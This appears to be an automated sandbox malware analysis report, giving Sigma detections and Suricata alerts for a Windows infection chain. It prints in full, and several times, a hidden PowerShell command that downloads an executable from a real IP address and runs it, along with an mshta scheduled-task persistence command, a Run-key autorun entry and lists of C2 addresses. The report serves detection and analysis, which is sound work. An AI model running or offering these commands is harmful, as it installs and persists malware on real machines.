                                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: Suspicious Script Execution From Temp Folder
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ProcessId: 8020, ProcessName: mshta.exe
                                                Sigma detected: Browser Started with Remote Debugging
                                                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe, ParentProcessId: 4156, ParentProcessName: ILqcVeT.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7972, ProcessName: chrome.exe
                                                Sigma detected: CurrentVersion Autorun Keys Modification
                                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 2188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132fd7f0ed.exe
                                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8132, TargetFilename: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE
                                                Sigma detected: PowerShell Download Pattern
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: PowerShell Web Download
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: Suspicious Outbound SMTP Connections
                                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 52.60.87.163, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\ProgramData\jnxnee\benskvi.exe, Initiated: true, ProcessId: 3108, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49803
                                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8000, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8076, ProcessName: schtasks.exe
                                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: Non Interactive PowerShell Process Spawned
                                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                                                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 4772, ProcessName: powershell.exe
                                                Sigma detected: Windows Processes Suspicious Parent Directory
                                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7092, ProcessName: svchost.exe

                                                Data Obfuscation

                                                barindex
                                                Sigma detected: Powershell download and execute file
                                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe

                                                Suricata Signatures

                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:58.872169+010020283713Unknown Traffic192.168.2.1159943104.21.80.1443TCP
                                                2025-03-06T08:11:01.455608+010020283713Unknown Traffic192.168.2.1164532104.21.80.1443TCP
                                                2025-03-06T08:11:05.348829+010020283713Unknown Traffic192.168.2.1164586104.21.80.1443TCP
                                                2025-03-06T08:11:09.589956+010020283713Unknown Traffic192.168.2.1164662104.21.80.1443TCP
                                                2025-03-06T08:11:13.746062+010020283713Unknown Traffic192.168.2.1164756104.21.80.1443TCP
                                                2025-03-06T08:11:17.035737+010020283713Unknown Traffic192.168.2.1164821104.21.80.1443TCP
                                                2025-03-06T08:11:17.506679+010020283713Unknown Traffic192.168.2.116482323.197.127.21443TCP
                                                2025-03-06T08:11:22.001493+010020283713Unknown Traffic192.168.2.1153736104.21.24.225443TCP
                                                2025-03-06T08:11:22.501727+010020283713Unknown Traffic192.168.2.1153747104.21.80.1443TCP
                                                2025-03-06T08:11:24.572361+010020283713Unknown Traffic192.168.2.1153889104.21.24.225443TCP
                                                2025-03-06T08:11:26.211732+010020283713Unknown Traffic192.168.2.1153928104.21.48.1443TCP
                                                2025-03-06T08:11:27.470136+010020283713Unknown Traffic192.168.2.1153950104.21.24.225443TCP
                                                2025-03-06T08:11:27.889618+010020283713Unknown Traffic192.168.2.1153957104.21.80.1443TCP
                                                2025-03-06T08:11:28.828094+010020283713Unknown Traffic192.168.2.1150532104.21.48.1443TCP
                                                2025-03-06T08:11:30.423814+010020283713Unknown Traffic192.168.2.1150549104.21.24.225443TCP
                                                2025-03-06T08:11:31.777050+010020283713Unknown Traffic192.168.2.1150574104.21.48.1443TCP
                                                2025-03-06T08:11:33.146362+010020283713Unknown Traffic192.168.2.1150611104.21.24.225443TCP
                                                2025-03-06T08:11:34.573818+010020283713Unknown Traffic192.168.2.1150636104.21.48.1443TCP
                                                2025-03-06T08:11:35.951803+010020283713Unknown Traffic192.168.2.1150654104.21.24.225443TCP
                                                2025-03-06T08:11:37.407242+010020283713Unknown Traffic192.168.2.1150676104.21.48.1443TCP
                                                2025-03-06T08:11:39.107647+010020283713Unknown Traffic192.168.2.1150703104.21.24.225443TCP
                                                2025-03-06T08:11:41.153251+010020283713Unknown Traffic192.168.2.1150732104.21.48.1443TCP
                                                2025-03-06T08:11:43.141219+010020283713Unknown Traffic192.168.2.1150776104.21.48.1443TCP
                                                2025-03-06T08:11:43.420367+010020283713Unknown Traffic192.168.2.1150783104.21.24.225443TCP
                                                2025-03-06T08:11:44.321777+010020283713Unknown Traffic192.168.2.1150804104.21.48.1443TCP
                                                2025-03-06T08:11:45.672242+010020283713Unknown Traffic192.168.2.1150839104.21.48.1443TCP
                                                2025-03-06T08:11:48.924800+010020283713Unknown Traffic192.168.2.1150902104.21.48.1443TCP
                                                2025-03-06T08:11:50.479791+010020283713Unknown Traffic192.168.2.1150951104.21.48.1443TCP
                                                2025-03-06T08:11:53.135867+010020283713Unknown Traffic192.168.2.1150998104.21.48.1443TCP
                                                2025-03-06T08:11:56.022985+010020283713Unknown Traffic192.168.2.1151039104.21.48.1443TCP
                                                2025-03-06T08:11:59.155904+010020283713Unknown Traffic192.168.2.1151082104.21.48.1443TCP
                                                2025-03-06T08:12:02.375781+010020283713Unknown Traffic192.168.2.1151118104.21.48.1443TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:59.581220+010020546531A Network Trojan was detected192.168.2.1159943104.21.80.1443TCP
                                                2025-03-06T08:11:02.927197+010020546531A Network Trojan was detected192.168.2.1164532104.21.80.1443TCP
                                                2025-03-06T08:11:22.802782+010020546531A Network Trojan was detected192.168.2.1153736104.21.24.225443TCP
                                                2025-03-06T08:11:25.453470+010020546531A Network Trojan was detected192.168.2.1153889104.21.24.225443TCP
                                                2025-03-06T08:11:27.043208+010020546531A Network Trojan was detected192.168.2.1153928104.21.48.1443TCP
                                                2025-03-06T08:11:28.758723+010020546531A Network Trojan was detected192.168.2.1153957104.21.80.1443TCP
                                                2025-03-06T08:11:29.700882+010020546531A Network Trojan was detected192.168.2.1150532104.21.48.1443TCP
                                                2025-03-06T08:11:43.977267+010020546531A Network Trojan was detected192.168.2.1150776104.21.48.1443TCP
                                                2025-03-06T08:11:44.321253+010020546531A Network Trojan was detected192.168.2.1150783104.21.24.225443TCP
                                                2025-03-06T08:11:46.583683+010020546531A Network Trojan was detected192.168.2.1150839104.21.48.1443TCP
                                                2025-03-06T08:11:49.797302+010020546531A Network Trojan was detected192.168.2.1150902104.21.48.1443TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:59.581220+010020498361A Network Trojan was detected192.168.2.1159943104.21.80.1443TCP
                                                2025-03-06T08:11:22.802782+010020498361A Network Trojan was detected192.168.2.1153736104.21.24.225443TCP
                                                2025-03-06T08:11:27.043208+010020498361A Network Trojan was detected192.168.2.1153928104.21.48.1443TCP
                                                2025-03-06T08:11:43.977267+010020498361A Network Trojan was detected192.168.2.1150776104.21.48.1443TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:58.872169+010020603861Domain Observed Used for C2 Detected192.168.2.1159943104.21.80.1443TCP
                                                2025-03-06T08:11:01.455608+010020603861Domain Observed Used for C2 Detected192.168.2.1164532104.21.80.1443TCP
                                                2025-03-06T08:11:05.348829+010020603861Domain Observed Used for C2 Detected192.168.2.1164586104.21.80.1443TCP
                                                2025-03-06T08:11:09.589956+010020603861Domain Observed Used for C2 Detected192.168.2.1164662104.21.80.1443TCP
                                                2025-03-06T08:11:13.746062+010020603861Domain Observed Used for C2 Detected192.168.2.1164756104.21.80.1443TCP
                                                2025-03-06T08:11:17.035737+010020603861Domain Observed Used for C2 Detected192.168.2.1164821104.21.80.1443TCP
                                                2025-03-06T08:11:22.501727+010020603861Domain Observed Used for C2 Detected192.168.2.1153747104.21.80.1443TCP
                                                2025-03-06T08:11:27.889618+010020603861Domain Observed Used for C2 Detected192.168.2.1153957104.21.80.1443TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.392169+010020604101Domain Observed Used for C2 Detected192.168.2.11560561.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.500878+010020604121Domain Observed Used for C2 Detected192.168.2.11493801.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:57.054256+010020603851Domain Observed Used for C2 Detected192.168.2.11584941.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.342665+010020604141Domain Observed Used for C2 Detected192.168.2.11523241.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.473826+010020604161Domain Observed Used for C2 Detected192.168.2.11618091.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.439579+010020604181Domain Observed Used for C2 Detected192.168.2.11624071.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.487878+010020604201Domain Observed Used for C2 Detected192.168.2.11610701.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.460757+010020604221Domain Observed Used for C2 Detected192.168.2.11617771.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:15.380081+010020604241Domain Observed Used for C2 Detected192.168.2.11591741.1.1.153UDP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:24.841170+010020442451Malware Command and Control Activity Detected38.180.229.21780192.168.2.1149762TCP
                                                2025-03-06T08:11:08.316833+010020442451Malware Command and Control Activity Detected38.180.229.21780192.168.2.1164638TCP
                                                2025-03-06T08:11:49.121923+010020442451Malware Command and Control Activity Detected45.93.20.2880192.168.2.1150918TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:24.781546+010020442441Malware Command and Control Activity Detected192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:08.294584+010020442441Malware Command and Control Activity Detected192.168.2.116463838.180.229.21780TCP
                                                2025-03-06T08:11:48.980732+010020442441Malware Command and Control Activity Detected192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:25.052844+010020442461Malware Command and Control Activity Detected192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:08.521453+010020442461Malware Command and Control Activity Detected192.168.2.116463838.180.229.21780TCP
                                                2025-03-06T08:11:49.354046+010020442461Malware Command and Control Activity Detected192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:01.151633+010020442491Malware Command and Control Activity Detected192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:43.417061+010020442491Malware Command and Control Activity Detected192.168.2.115082238.180.229.21780TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:25.886236+010020442481Malware Command and Control Activity Detected192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:09.083260+010020442481Malware Command and Control Activity Detected192.168.2.116463838.180.229.21780TCP
                                                2025-03-06T08:11:51.167019+010020442481Malware Command and Control Activity Detected192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:25.276585+010020442471Malware Command and Control Activity Detected38.180.229.21780192.168.2.1149762TCP
                                                2025-03-06T08:11:08.539104+010020442471Malware Command and Control Activity Detected38.180.229.21780192.168.2.1164638TCP
                                                2025-03-06T08:11:49.385659+010020442471Malware Command and Control Activity Detected45.93.20.2880192.168.2.1150918TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:06.877348+010020480941Malware Command and Control Activity Detected192.168.2.1164586104.21.80.1443TCP
                                                2025-03-06T08:11:36.746461+010020480941Malware Command and Control Activity Detected192.168.2.1150654104.21.24.225443TCP
                                                2025-03-06T08:12:00.044452+010020480941Malware Command and Control Activity Detected192.168.2.1151082104.21.48.1443TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:24.567613+010020442431Malware Command and Control Activity Detected192.168.2.114976238.180.229.21780TCP
                                                2025-03-06T08:11:08.038389+010020442431Malware Command and Control Activity Detected192.168.2.116463838.180.229.21780TCP
                                                2025-03-06T08:11:48.723929+010020442431Malware Command and Control Activity Detected192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:07.081676+010028561471A Network Trojan was detected192.168.2.1149752176.113.115.680TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:20.526495+010028561481A Network Trojan was detected192.168.2.1149759107.189.27.6680TCP
                                                2025-03-06T08:10:31.966158+010028561481A Network Trojan was detected192.168.2.1149777107.189.27.6680TCP
                                                2025-03-06T08:10:36.433776+010028561481A Network Trojan was detected192.168.2.1149791107.189.27.6680TCP
                                                2025-03-06T08:10:41.077034+010028561481A Network Trojan was detected192.168.2.1149796107.189.27.6680TCP
                                                2025-03-06T08:10:45.475636+010028561481A Network Trojan was detected192.168.2.1149802107.189.27.6680TCP
                                                2025-03-06T08:10:49.850438+010028561481A Network Trojan was detected192.168.2.1159843107.189.27.6680TCP
                                                2025-03-06T08:10:54.997278+010028561481A Network Trojan was detected192.168.2.1159898107.189.27.6680TCP
                                                2025-03-06T08:10:59.715567+010028561481A Network Trojan was detected192.168.2.1159985107.189.27.6680TCP
                                                2025-03-06T08:11:05.223654+010028561481A Network Trojan was detected192.168.2.1164596107.189.27.6680TCP
                                                2025-03-06T08:11:10.093570+010028561481A Network Trojan was detected192.168.2.1164700107.189.27.6680TCP
                                                2025-03-06T08:11:15.292947+010028561481A Network Trojan was detected192.168.2.1164808107.189.27.6680TCP
                                                2025-03-06T08:11:20.280059+010028561481A Network Trojan was detected192.168.2.1153717107.189.27.6680TCP
                                                2025-03-06T08:11:24.896420+010028561481A Network Trojan was detected192.168.2.1153925107.189.27.6680TCP
                                                2025-03-06T08:11:29.326690+010028561481A Network Trojan was detected192.168.2.1150556107.189.27.6680TCP
                                                2025-03-06T08:11:33.746496+010028561481A Network Trojan was detected192.168.2.1150641107.189.27.6680TCP
                                                2025-03-06T08:11:38.160634+010028561481A Network Trojan was detected192.168.2.1150706107.189.27.6680TCP
                                                2025-03-06T08:11:43.541179+010028561481A Network Trojan was detected192.168.2.1150812107.189.27.6680TCP
                                                2025-03-06T08:11:48.131201+010028561481A Network Trojan was detected192.168.2.1150911107.189.27.6680TCP
                                                2025-03-06T08:11:52.608288+010028561481A Network Trojan was detected192.168.2.1151005107.189.27.6680TCP
                                                2025-03-06T08:11:57.029519+010028561481A Network Trojan was detected192.168.2.1151066107.189.27.6680TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:10:11.849663+010028033053Unknown Traffic192.168.2.1149755176.113.115.780TCP
                                                2025-03-06T08:10:17.676605+010028033053Unknown Traffic192.168.2.1149757176.113.115.780TCP
                                                2025-03-06T08:10:22.998574+010028033053Unknown Traffic192.168.2.114976145.59.120.880TCP
                                                2025-03-06T08:10:24.897256+010028033053Unknown Traffic192.168.2.1149763176.113.115.780TCP
                                                2025-03-06T08:10:32.054230+010028033053Unknown Traffic192.168.2.1149776176.113.115.780TCP
                                                2025-03-06T08:10:38.580972+010028033053Unknown Traffic192.168.2.1149793176.113.115.780TCP
                                                2025-03-06T08:10:44.173243+010028033053Unknown Traffic192.168.2.1149801176.113.115.780TCP
